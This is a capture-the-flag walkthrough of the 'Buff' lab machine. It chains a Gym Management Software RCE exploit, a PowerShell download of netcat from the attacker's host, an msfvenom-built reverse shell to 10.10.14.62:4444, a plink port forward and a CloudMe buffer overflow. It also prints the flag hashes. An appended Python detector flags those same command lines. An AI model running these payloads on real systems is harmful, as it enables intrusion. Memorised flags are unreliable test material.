buff
nmap
nmap shows the only service running is http on port 8080
gym management software 1.0
navigating through the web server's contact.php page, there is a note that Buff's site runs on Gym Management Software 1.0.
Googling Gym Management Software returns an Unauthenticated Remote Code Execution vulnerability
unauthenticated RCE exploit
we can look up the exploit locally using searchsploit and the Exploit-DB ID number
python gym_software_exploit.py http://10.10.10.198:8080/   <- don't forget the trailing slash
we have a foothold!
but since the shell is limited, let's call a fully functional shell back to our attack machine
reverse shell
an easy way to do that is to have our victim download netcat for windows and execute it remotely to call a shell back to us.
first locate nc.exe, mv it to your working directory and spin up an http server
then have our victim download it
powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.13/nc.exe','C:\xampp\htdocs\gym\upload\nc.exe')"
privesc w/ CloudMe_1112.exe
looking at our owned user shaun's Downloads folder we see an interesting executable named CloudMe_1112.exe
searchsploit CloudMe
we'll choose the first exploit and mirror it to our directory with searchsploit -m windows/remote/48389
generate shell code
since the buffer overflow is mostly already written for us, all we need to do is tweak the shellcode so that it calls back to our attack machine
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.62 4444' -f py -b '\x00\x0a\x0d' -v payload
now sub out 48389's shellcode for our msfvenom-generated shellcode
plink
we want to forward the victim's local port 8888 back to our attack machine so we can run the exploit locally on our attacking machine, since Buff does not have python
first download plink to our windows victim with a powershell downloadfile cmd
plink.exe -l st0ve -pw 12345 10.10.14.62 -R 8888:127.0.0.1:8888
+
reverse shell
make sure you set up your listener as user st0ve since that's what our victim is plinked to
we run our exploit, which attacks our localhost (127.0.0.1 on port 8888, which forwards to Buff's port 8888) and....
we're root
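from the defender's side, all three post-exploitation steps in this walkthrough (the PowerShell WebClient download, netcat bound to cmd.exe, and the plink remote port forward with a password on the command line) leave distinctive process command lines. the following is an added example, not part of the original writeup or the CloudMe/Gym Management exploits: it scans constructed Sysmon Event ID 1 style records (image path + command line) and labels the ones that match those techniques. the sample records and the host/port/path values in them are constructed to mirror the commands above.

```python
"""Flag the post-exploitation command lines this writeup demonstrates.

Added example (not part of the original writeup). Scans constructed
Windows process-creation records, Sysmon Event ID 1 style: (image, command
line), for the techniques shown above: a PowerShell WebClient download,
netcat bound to a shell, and a plink remote port forward. The host, port
and path values in the sample records are constructed placeholders.
"""
import re

# (label, regex) pairs: each pattern targets one technique from the writeup.
RULES = [
    # (new-object System.Net.WebClient).DownloadFile(...) / DownloadString(...)
    ("powershell_webclient_download",
     re.compile(r"new-object\s+system\.net\.webclient.*?\.download(file|string)\s*\(", re.I)),
    # nc.exe / nc64.exe launched with -e cmd.exe or -e powershell.exe
    ("netcat_bound_shell",
     re.compile(r"\bnc(64)?\.exe\b.*\s-e\s+(cmd|powershell)(\.exe)?\b", re.I)),
    # plink -R <port>:<host>:<port> (remote port forward back to an SSH server)
    ("plink_remote_forward",
     re.compile(r"\bplink(\.exe)?\b.*\s-R\s+\d+:[\w.]+:\d+", re.I)),
    # plink -pw <password>: credential exposed in the process command line
    ("plink_plaintext_password",
     re.compile(r"\bplink(\.exe)?\b.*\s-pw\s+\S+", re.I)),
]


def classify(command_line):
    """Return the list of rule labels that match one command line (in RULES order)."""
    return [label for label, rx in RULES if rx.search(command_line)]


def scan(records):
    """records: iterable of (image, command_line). Return [(image, labels)] for hits only."""
    hits = []
    for image, cmdline in records:
        labels = classify(cmdline)
        if labels:
            hits.append((image, labels))
    return hits


# Constructed sample records mirroring the commands in the writeup, plus one benign line.
SAMPLE_RECORDS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -c \"(new-object System.Net.WebClient).DownloadFile("
     "'http://10.10.14.13/nc.exe','C:\\xampp\\htdocs\\gym\\upload\\nc.exe')\""),
    (r"C:\xampp\htdocs\gym\upload\nc.exe",
     "C:\\xampp\\htdocs\\gym\\upload\\nc.exe -e cmd.exe 10.10.14.62 4444"),
    (r"C:\xampp\htdocs\gym\upload\plink.exe",
     "plink.exe -l st0ve -pw 12345 10.10.14.62 -R 8888:127.0.0.1:8888"),
    (r"C:\Windows\System32\svchost.exe",
     "svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    for image, labels in scan(SAMPLE_RECORDS):
        print(f"{image}: {', '.join(labels)}")
```

the benign svchost.exe record produces no hit; the plink record trips two rules at once, the forward itself and the password passed on the command line, which is the same weakness that let the plink line above be copied straight out of process telemetry.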
user/root
29a8c6e451149cf2499ebabeb7aec7d4
d8f697cf088291568ccf206c16ea3b49